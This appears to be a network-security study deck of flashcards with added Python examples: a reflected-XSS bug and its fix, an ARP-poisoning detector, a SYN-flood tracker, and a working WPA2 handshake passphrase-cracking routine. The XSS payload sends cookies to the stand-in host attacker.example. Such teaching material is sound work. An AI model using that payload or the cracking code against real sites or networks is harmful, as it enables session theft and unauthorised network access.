FINAL
What would a signal range for a Bluetooth device commonly be?
300 ft for 4.0
What would you use a bluebugging attack for?
A bluebugging attack takes control of a Bluetooth-enabled phone, for example to make it silently place a call to the attacker's phone so the attacker can listen to whatever is happening around the phone's owner.
XSS attack
A cross-site scripting attack injects attacker-controlled script into a page served by a trusted web server so that the script runs in other users' browsers; the server is the delivery vehicle and the client is the target.
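Added example, not from the original deck: a reflected XSS bug beside its fix. The page template, the search-term payload and the helper names are made up for illustration; the point is that the server reflects input into HTML and the browser then treats it as markup, while output encoding for the HTML context makes it plain text.

```python
import html

# Constructed attacker input: a "search term" a victim could be tricked into
# submitting via a crafted link (reflected XSS). Not taken from any real site.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_unsafe(query: str) -> str:
    """Vulnerable: user input is reflected straight into the HTML the server
    sends, so the browser parses the payload as markup and runs the script."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Hardened: output-encode for the HTML body context so the browser
    renders the text. quote=True also escapes quotes, which matters if the
    same value is ever placed inside an attribute."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def has_script_tag(page: str) -> bool:
    """Helper used only to make the difference visible: is a live <script> present?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
```

Encoding is context-specific: inside a JavaScript string, a URL or a CSS value the HTML escaper is the wrong tool, and a Content-Security-Policy header is worth adding as a second layer in case one output is missed.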
man-in-the-middle attack
A form of eavesdropping where the attacker makes an independent connection between two victims and steals information to use fraudulently.
1st type of ids
A host-based IDS watches activity on a local system, such as changes to critical system files. It may also watch log files or audit other system behaviors.
What tool could you use to enable sniffing on your wireless network to acquire all headers?
Airmon-ng (puts the wireless adapter into monitor mode; airodump-ng then captures the raw 802.11 frames, headers included)
Smurf Attack
An attack that sends an ICMP echo request to the network's broadcast address with the source address spoofed to that of the target, so every host on the segment replies to the victim at once.
What can an intrusion prevention system do that an intrusion detection system can't?
Block or reject network traffic
Why is bluesnarfing potentially more dangerous than bluejacking from the standpoint of the victim?
Bluejacking only pushes an unsolicited message to the victim's device (a nuisance); bluesnarfing pulls data such as contacts, calendar entries and messages off it without the victim's knowledge.
Port 53
DNS (Domain Name System)
TCP vulnerabilities
Denial-of-service attacks (for example SYN floods that exhaust the connection backlog)
What type of attack is a compromise of availability?
DoS
How would you ensure that confidentiality is implemented in an organization?
Encryption
IP Vulnerabilities
Expose IoT
Restricted
Exposure of restricted data would have undesirable effects.
Port 21
FTP (File Transfer Protocol) Command
Port 20
FTP (File Transfer Protocol) Data
How to find the port address on Wireshark
Select a TCP packet and expand the Transmission Control Protocol section in the packet details pane; it lists the source and destination ports.
What is the purpose of a deauthentication attack?
Forcing stations off the network so they must reauthenticate, which lets an attacker who is capturing traffic record the WPA handshake
How many stages are used in the WPA handshake?
Four
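Added example, not part of the original deck: why capturing the four-way handshake (after a deauthentication) is enough for an offline dictionary attack against WPA2-Personal. The MAC addresses, nonces, EAPOL frame and passphrase below are all constructed stand-ins for values that would normally be pulled out of a capture; the key derivation steps (PBKDF2 for the PMK, the 802.11i PRF-512 for the PTK, HMAC-SHA1 for the message MIC) are the real ones.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    #   min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    # Both addresses and both nonces travel in the clear in messages 1 and 2.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of SHA-1 output covers the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    # WPA2 (key descriptor version 2): MIC = first 16 bytes of HMAC-SHA1(KCK, EAPOL-Key
    # frame with its MIC field zeroed). KCK is the first 16 bytes of the PTK.
    # (WPA/TKIP, version 1, uses HMAC-MD5 instead.)
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def recover_passphrase(ssid, aa, spa, anonce, snonce, eapol_frame_mic_zeroed, captured_mic, wordlist):
    """Offline dictionary attack: each candidate gives a PMK, a PTK and so a KCK;
    the candidate whose MIC matches the captured one is the network passphrase."""
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame_mic_zeroed), captured_mic):
            return candidate
    return None


# Constructed handshake material standing in for values read from a capture
# (airodump-ng / Wireshark). Everything here is made up for the example.
SSID = "CorpWiFi"
AA = bytes.fromhex("001122334455")      # access point (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")     # client (supplicant) MAC
ANONCE = bytes(range(32))               # nonce from message 1
SNONCE = bytes(range(32, 64))           # nonce from message 2
# Stand-in EAPOL-Key message 2 body with the 16-byte MIC field already zeroed,
# which is how the frame is fed to the MIC computation.
EAPOL_MSG2_MIC_ZEROED = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 8 + SNONCE + b"\x00" * 64
TRUE_PASSPHRASE = "correct horse battery"


def captured_mic_for(passphrase: str) -> bytes:
    # The MIC the client would have sent if this were its passphrase. In a real
    # attack this value is simply read out of message 2 of the capture.
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2_MIC_ZEROED)


def demo(wordlist=("password", "letmein", TRUE_PASSPHRASE, "changeme")):
    return recover_passphrase(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_MSG2_MIC_ZEROED,
                              captured_mic_for(TRUE_PASSPHRASE), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The cost of the attack is one PBKDF2 run (4096 HMAC-SHA1 iterations) per candidate, which is why aircrack-ng and hashcat precompute or GPU-accelerate it; the practical defences are a long random passphrase or WPA3-SAE, which has no offline-crackable handshake.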
An intrusion detection system can perform which of the following functions?
Generate alerts on traffic
Port 80
HTTP (HyperText Transfer Protocol) - used for transferring web pages
Port 443
HTTPS (Hyper Text Transfer Protocol Secure) Secure communications
What protocol is used for a Smurf attack?
ICMP
WPA2 (Wi-Fi Protected Access 2)
IEEE 802.11i-2004
What is the purpose of performing a Bluetooth scan?
Identifying endpoints (discoverable devices in range and their addresses)
What is Weak in WEP
The initialization vector: only 24 bits long, so IVs repeat quickly on a busy network and the RC4 keystream (and then the key) can be recovered.
If you were implementing defense in breadth, what might you do?
Introduce a DevSecOps culture
IPS
Intrusion Prevention System will drop and reject malicious traffic
ARP Poisoning
Occurs at the data link layer; the attacker must be on the same LAN. The attacker sends ARP replies associating their own MAC address with the IP address of the target so that any traffic meant for the target is delivered to the attacker instead.
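Added example, not part of the original deck: the detection side of ARP poisoning. The ARP replies below are constructed (timestamp, sender IP, sender MAC) tuples representing what a sniffer on the LAN would see; the detector keeps an IP-to-MAC table and alerts when an IP's MAC changes, flagging especially a MAC that is now claiming more than one IP, which is the signature of a host impersonating the gateway.

```python
from collections import defaultdict

# Constructed ARP "is-at" replies as seen on the LAN (timestamp, sender IP, sender MAC).
# Made up for the example; not from a real capture.
ARP_REPLIES = [
    (1.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # real gateway announces itself
    (1.5, "192.168.1.20", "aa:bb:cc:00:00:20"),   # victim workstation
    (2.0, "192.168.1.50", "de:ad:be:ef:00:50"),   # attacker's own host
    (3.0, "192.168.1.1",  "de:ad:be:ef:00:50"),   # attacker claims the gateway IP
    (3.1, "192.168.1.20", "de:ad:be:ef:00:50"),   # ...and the victim's IP (full MITM)
]


def detect_arp_poisoning(replies):
    """Replay ARP replies in order and return one alert per IP-to-MAC change.

    Each alert is (timestamp, ip, old_mac, new_mac, other_ips_already_claimed_by_new_mac).
    A non-empty last element means one MAC is answering for several IPs at once."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            others = sorted(mac_to_ips[mac] - {ip})
            alerts.append((ts, ip, previous, mac, others))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    return alerts


if __name__ == "__main__":
    for ts, ip, old, new, others in detect_arp_poisoning(ARP_REPLIES):
        print(f"[{ts}] {ip} moved {old} -> {new}; that MAC also claims {others}")
```

A legitimate change (a replaced NIC, DHCP reuse) trips the first check too, so the second signal is the one worth paging on. On the prevention side, static ARP entries for the gateway on critical hosts and Dynamic ARP Inspection on managed switches stop the forged replies from taking effect.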
What types of authentication are allowed in a WPA-encrypted network?
Personal and enterprise
What are the phases of the ISO 27001 cycle?
Plan, Do, Check, Act
How would you calculate risk?
Probability * loss value
Port 25
SMTP (Simple Mail Transfer Protocol) Routing mail between mail servers
Port 22
SSH (Secure Shell) Secure login, file transfer and port forwarding
TCP 3-way handshake
Sender sends a SYN, receiver replies with a SYN-ACK, sender sends an ACK; the connection is then established.
Fraggle Attack
Smurf attack variation that uses UDP instead of ICMP.
Which of the following products might be used as an intrusion detection system?
Snort
How does an evil twin attack work?
Spoofing an SSID
UDP vulnerability
Spoofing and DoS attacks (UDP is connectionless, so there is no handshake to validate the source address)
How to find the destination address on Wireshark
Statistics > Conversations, then the Ethernet (or IPv4) tab
DNS Poisoning
A technique used by criminals to alter DNS records (in a resolver's cache or in the zone itself) so that users are sent to fake sites, typically for phishing.
Port 23
Telnet Unencrypted text communications
TCP SYN Attack
The attacker sends many SYNs but never sends the final ACK, so each connection stays half open. Every half-open connection holds server state until it times out, and enough of them fill the server's backlog so that legitimate clients can no longer connect.
Confidential
The exposure of confidential information would cause damage to national security.
Secret
The exposure of secret information would cause serious damage to national security.
Top secret
The highest level of data classification. Only a very limited number of people will be able to look at data classified as top secret.
If you were to see that someone was using OpenVAS, followed by Nessus, what might you assume?
They were trying to reduce false positives
Official
Information that relates to government business; the label by itself does not indicate how much harm its loss or exposure would cause.
What would be necessary for a TCP conversation to be considered ESTABLISHED by a stateful firewall?
Three-way handshake complete
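Added example, not from the original deck, covering both the stateful-firewall question above and the TCP SYN attack card: a minimal connection tracker that only marks a flow ESTABLISHED once all three handshake steps have been seen, and then counts the flows stuck before step 3. The packet list is constructed (one real client, three spoofed flood sources) and the addresses, ports and threshold are made up.

```python
from collections import Counter

SYN, ACK = 0x02, 0x10

# Constructed packets (src_ip, src_port, dst_ip, dst_port, tcp_flags) as a stateful
# firewall in front of 10.0.0.1:80 would see them. Not from a real capture.
PACKETS = [
    # one legitimate client completing the three-way handshake
    ("10.0.0.5", 40000, "10.0.0.1", 80, SYN),
    ("10.0.0.1", 80, "10.0.0.5", 40000, SYN | ACK),
    ("10.0.0.5", 40000, "10.0.0.1", 80, ACK),
    # SYN flood: spoofed sources send SYNs, the server answers, the final ACK never comes
    ("198.51.100.7", 1025, "10.0.0.1", 80, SYN),
    ("10.0.0.1", 80, "198.51.100.7", 1025, SYN | ACK),
    ("198.51.100.8", 1026, "10.0.0.1", 80, SYN),
    ("10.0.0.1", 80, "198.51.100.8", 1026, SYN | ACK),
    ("198.51.100.9", 1027, "10.0.0.1", 80, SYN),
    ("10.0.0.1", 80, "198.51.100.9", 1027, SYN | ACK),
]


def track_connections(packets):
    """Replay packets in order; return {(client, cport, server, sport): state}.
    The key is always written client-side first, whichever direction a packet travels."""
    flows = {}
    for src, sport, dst, dport, flags in packets:
        if flags == SYN:                                   # step 1, client -> server
            flows[(src, sport, dst, dport)] = "SYN_SENT"
        elif flags == SYN | ACK:                           # step 2, server -> client
            key = (dst, dport, src, sport)
            if flows.get(key) == "SYN_SENT":
                flows[key] = "SYN_RECEIVED"
        elif flags & ACK and not flags & SYN:              # step 3, client -> server
            key = (src, sport, dst, dport)
            if flows.get(key) == "SYN_RECEIVED":
                flows[key] = "ESTABLISHED"
    return flows


def half_open_per_server(flows):
    """Count handshakes that never reached step 3, per server socket.
    Counting per source would not help: flood sources are usually spoofed."""
    return Counter((server, sport)
                   for (_, _, server, sport), state in flows.items()
                   if state != "ESTABLISHED")


def syn_flood_suspects(flows, threshold=3):
    return sorted(sock for sock, n in half_open_per_server(flows).items() if n >= threshold)


if __name__ == "__main__":
    flows = track_connections(PACKETS)
    for key, state in flows.items():
        print(key, state)
    print("servers under SYN flood:", syn_flood_suspects(flows))
```

A real tracker also expires SYN_RECEIVED entries after a timeout, otherwise the tracker itself becomes the thing the flood exhausts; on the server side SYN cookies avoid keeping per-connection state until the third packet arrives.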
Which information would a packet filter use to make decisions about what traffic to allow into the network?
UDP source port
Unclassified
Unclassified information can be viewed by everyone. This may include declassified information that was once considered a higher classification but the threat posed by its exposure has subsided.
To remove malware from the network before it gets to the endpoint, you would use which of the following?
Unified threat management appliance
What important event can be exposed by enabling auditing?
User login
How to find the source address on Wireshark
Select the frame and expand it in the packet details pane: the Ethernet layer shows the source MAC and the Internet Protocol layer the source IP (for ARP traffic, look in the Address Resolution Protocol section).
Which of these isn't an example of an attack that compromises integrity?
Watering hole
Which of these is an example of an application layer gateway?
Web application firewall
WPA2
WiFi Protected Access 2
WPA
Wi-Fi Protected Access. Designed to replace WEP; uses TKIP for per-packet key mixing, still on top of the RC4 stream cipher.
What tool would allow you to run an evil twin attack?
Wifiphisher
WEP
Wired Equivalent Privacy.
What would be a reason to use the Override feature in OpenVAS?
You want to change a severity rating on a finding.
2nd type of IDS
A network IDS applies the same sorts of rules to traffic seen on the wire and generates alerts or log messages when they match.
Fragmentation Attack
Splitting an attack across IP fragments can evade inline security devices: the device would have to reassemble the fragments before the malicious content became visible, and because reassembly adds latency some devices skip it and inspect each fragment on its own.
Land Attack
Sets the source address and port of a TCP segment equal to its destination address and port (the target's). A vulnerable stack processes the segment as outbound, then as inbound, and so on in a loop that locks up the system.
Evil Twin Attack
uses a rogue access point to pretend to be a legitimate network
